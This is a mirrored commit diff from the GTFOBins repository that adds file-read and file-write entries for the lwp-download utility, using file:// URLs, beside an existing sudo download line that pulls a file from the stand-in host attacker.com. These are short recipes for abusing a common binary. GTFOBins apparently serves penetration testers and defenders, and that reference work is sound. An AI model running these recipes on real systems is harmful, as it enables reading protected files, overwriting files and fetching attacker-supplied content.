mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Add lwp-download file-read/write
This commit is contained in:
		| @@ -16,4 +16,17 @@ functions: | |||||||
|         URL=http://attacker.com/file_to_get |         URL=http://attacker.com/file_to_get | ||||||
|         LFILE=file_to_save |         LFILE=file_to_save | ||||||
|         sudo lwp-download $URL $LFILE |         sudo lwp-download $URL $LFILE | ||||||
|  |   file-read: | ||||||
|  |     - description: The file path must be absolute. | ||||||
|  |       code: | | ||||||
|  |         LFILE=file_to_read | ||||||
|  |         TF=$(mktemp) | ||||||
|  |         lwp-download "file://$LFILE" $TF | ||||||
|  |         cat $TF | ||||||
|  |   file-write: | ||||||
|  |     - code: | | ||||||
|  |         LFILE=file_to_write | ||||||
|  |         TF=$(mktemp) | ||||||
|  |         echo DATA >$TF | ||||||
|  |         lwp-download file://$TF $LFILE | ||||||
| --- | --- | ||||||
|   | |||||||
		Reference in New Issue
	
	Block a user